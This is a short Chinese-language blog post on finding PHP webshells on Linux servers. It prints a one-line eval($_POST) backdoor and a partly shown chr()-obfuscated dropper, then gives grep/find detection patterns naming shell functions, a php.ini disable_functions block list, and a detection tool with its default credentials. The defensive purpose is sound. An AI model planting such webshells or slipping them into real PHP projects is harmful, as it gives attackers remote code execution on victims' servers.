linux查找webshell
首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裡面
<?php eval ($_POST[a]);?> //密碼為a,使用中國菜刀連接
隱藏很深的小馬
fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).
。。。省略
解碼:
其中chr括號裡面的數字是美國信息交換標准代碼,縮寫:ASCII 可以找一份對照表對應一下
比如 46 就是 .
47 就是 /
32 就是 空格
也可以echo chr(46)解出來
<?php
echo chr(46).chr(47).chr(97).chr(46)
?>
WINDOWS下的應該有很多日志分析和查殺工具(很少用WIN表示不能舉例),那麼,LINUX下如何查找WEBSHELL呢?
1
find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\]\(\$\_\POST\[|eval\(str_rot13'>/opt/www.log &
然後就手工查看,寫入計劃任務啦。
只查小馬的可以
1
grep -r --include=*.php '[^a-z]eval($_POST' . > post.txt
2
grep -r --include=*.php '[^a-z]eval($_REQUEST' . > REQUEST.txt
查出來了,重要的是要分析日志,查看入侵源頭。
防范:
禁用危險函數,整理權限,防止權限過大
1
disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s
2
ymlink,popepassthru,stream_socket_server,fsocket
git 下來 只需要2個文件
shelldetect.php //默認帳號密碼 admin protect
shelldetect.db
如果你有什麼好的建議,感謝你的分享:)
PS:shell反彈